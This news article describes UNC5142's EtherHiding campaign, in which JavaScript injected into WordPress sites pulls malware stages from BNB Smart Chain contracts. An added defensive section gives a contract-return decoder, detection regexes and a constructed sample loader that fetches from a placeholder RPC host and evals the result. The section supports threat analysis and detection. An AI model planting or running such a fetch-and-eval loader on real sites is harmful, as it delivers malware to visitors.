- A financially motivated group tracked as UNC5142 is spreading information-stealing malware with the help of blockchain smart contracts.
- The campaign runs on compromised WordPress sites and uses a technique called "EtherHiding", which stores malicious code and configuration on public blockchains such as the BNB Smart Chain.
- Google counted around 14,000 web pages carrying UNC5142's injected JavaScript as of June 2025, but no new activity has been observed since late July 2025.
- The infection chain is driven by a multi-stage JavaScript downloader called CLEARSHORT, which pulls its next stages from smart contracts and relies on social engineering to get victims to run the final payload.
- In late 2024 UNC5142 replaced its single smart contract with a more complex, flexible design that helps it evade detection and lets the operators update the chain quickly.
A financially motivated threat actor identified as UNC5142 has been using blockchain smart contracts to spread malware that steals information from Windows and macOS computers. The group targets compromised WordPress websites and uses a technique called “EtherHiding,” which hides malicious data on public blockchains such as the BNB Smart Chain.
Google Threat Intelligence Group (GTIG) reported that as of June 2025, about 14,000 web pages with injected malicious JavaScript related to UNC5142 were detected, showing widespread targeting of vulnerable WordPress sites. However, no related activity has been observed since July 23, 2025, which may indicate a pause or a change in tactics.
The attack chain relies on a JavaScript downloader named CLEARSHORT, which loads malware in several stages. The first stage is JavaScript injected into the compromised site's files; it makes a read-only call to a smart contract on the BNB Smart Chain to obtain the next stage. Using the data the contract returns, the script fetches an encrypted landing page, decrypts it and shows it to the visitor. That page is the lure that tricks victims into running harmful commands on their own systems, which leads to the malware infection.
On Windows, the attack executes a downloaded HTML Application (HTA) file that runs PowerShell scripts to avoid detection and load the final payload directly into memory. On macOS, attackers use deceptive prompts to get users to run terminal commands that download the Atomic Stealer malware.
CLEARSHORT is linked to ClearFake, a known malicious JavaScript framework. The French cybersecurity firm Sekoia previously analyzed ClearFake, which has operated since mid-2023 and began using the ClickFix social engineering method in May 2024.
The use of blockchain smart contracts helps UNC5142 blend in with normal Web3 activities and makes their operations more resistant to takedown efforts. Since November 2024, the group has moved from a simple contract system to a sophisticated three-contract design based on the proxy pattern, a common software method for upgradable code. This change allows quick updates to key parts like URLs and decryption keys without modifying the malicious JavaScript.
Because the data a smart contract stores is mutable, UNC5142 can change the malware delivery details simply by sending a transaction, paying a blockchain fee of under $2 each time. Google identified two main smart contract infrastructures: the primary system created in November 2024 and a secondary one started in February 2025, apparently used to support increased activity or for testing.
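The two mechanics described above, a loader that reads a contract with a read-only call and a contract whose stored values can be swapped at any time, both leave the same traces in the injected script. The following is an added example, not code from the article or from GTIG's report, showing the defender's side: how the ABI-encoded `string` returned by a JSON-RPC `eth_call` is decoded into a URL or key (the step any such loader has to perform), and a triage scanner that flags a script body carrying the combination of an `eth_call`, a BNB Smart Chain endpoint or chain id, a contract address and an `eval` of fetched data. The RPC hostname, contract address, function selector and the injected script are constructed for this example.

```javascript
// Added example for illustration; not UNC5142's or GTIG's code.
// Node.js (uses the global Buffer).

// Encode a string the way a Solidity `string` return value is ABI-encoded:
// 32-byte offset (always 32 for a single return value), 32-byte byte length,
// then the UTF-8 bytes right-padded with zeros to a multiple of 32 bytes.
// Used only to build test input offline; a real loader gets this from eth_call.
function encodeAbiString(s) {
  const data = Buffer.from(s, "utf8");
  const padded = Buffer.alloc(Math.ceil(data.length / 32) * 32);
  data.copy(padded);
  const word = (n) => Buffer.from(n.toString(16).padStart(64, "0"), "hex");
  return "0x" + Buffer.concat([word(32), word(data.length), padded]).toString("hex");
}

// Decode the `result` field of an eth_call JSON-RPC response into the string
// the contract returned. Length checks guard against truncated or hostile data.
function decodeAbiString(returnData) {
  const hex = returnData.replace(/^0x/, "");
  if (hex.length % 2 !== 0 || !/^[0-9a-fA-F]*$/.test(hex)) throw new Error("bad hex");
  const buf = Buffer.from(hex, "hex");
  if (buf.length < 64) throw new Error("return data too short");
  const offset = Number(BigInt("0x" + buf.subarray(0, 32).toString("hex")));
  if (offset + 32 > buf.length) throw new Error("offset outside return data");
  const len = Number(BigInt("0x" + buf.subarray(offset, offset + 32).toString("hex")));
  const start = offset + 32;
  if (start + len > buf.length) throw new Error("length exceeds return data");
  return buf.subarray(start, start + len).toString("utf8");
}

// Indicators an EtherHiding-style loader needs. Patterns are illustrative;
// a production ruleset would be tuned against the RPC providers actually seen.
const INDICATORS = [
  { name: "json-rpc eth_call", re: /["']eth_call["']/ },
  { name: "bnb smart chain rpc host", re: /bsc-dataseed|binance\.org|bsc\.nodereal/i },
  { name: "bsc chain id", re: /chainId["']?\s*[:=]\s*["']?(56|0x38)\b/ },
  { name: "contract address", re: /0x[0-9a-fA-F]{40}\b/ },
  { name: "function selector in call data", re: /\bdata["']?\s*:\s*["']0x[0-9a-fA-F]{8}/ },
  { name: "eval of fetched data", re: /\beval\s*\(/ },
];

// Run the indicators over one script body and summarise. Legitimate Web3 front
// ends also call eth_call, so the verdict is a triage hint for scripts found in
// places they should not be (WordPress core, theme or plugin files), not proof.
function scanScriptForEtherHiding(scriptText) {
  const matched = INDICATORS.filter((i) => i.re.test(scriptText)).map((i) => i.name);
  const has = (n) => matched.includes(n);
  let verdict = "no indicators";
  if (has("json-rpc eth_call") && has("contract address") &&
      (has("bnb smart chain rpc host") || has("bsc chain id"))) {
    verdict = "likely EtherHiding loader";
  } else if (matched.length > 0) {
    verdict = "partial indicators";
  }
  return { verdict, matched };
}

// Constructed sample of what an injected first stage could look like.
// Hostname, address and selector are placeholders, not real infrastructure.
const SAMPLE_INJECTED_SCRIPT = `
(async()=>{const r=await fetch("https://bsc-dataseed.example/",{method:"POST",
headers:{"content-type":"application/json"},body:JSON.stringify({jsonrpc:"2.0",id:1,
method:"eth_call",params:[{to:"0x1111111111111111111111111111111111111111",
data:"0x12345678"},"latest"]})});const j=await r.json();eval(decode(j.result));})();`;

// Stand-alone demonstration.
const url = decodeAbiString(encodeAbiString("https://lure.example/page"));
console.log("decoded contract value:", url);
console.log(scanScriptForEtherHiding(SAMPLE_INJECTED_SCRIPT));
```

The decoder is the part worth keeping in an analyst's toolbox: when a suspicious script's `eth_call` is replayed against a public RPC node, the `result` is exactly this encoding, and decoding it reveals the current landing page URL or key the operators have stored, which can change between two checks because the contract's storage is mutable.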
GTIG noted, “Given the frequent updates to the infection chain coupled with the consistent operational tempo, high volume of compromised websites, and diversity of distributed malware payloads over the past year and a half, it is likely that UNC5142 has experienced some level of success with their operations.”
For more details, the full report is available at Google Threat Intelligence Group.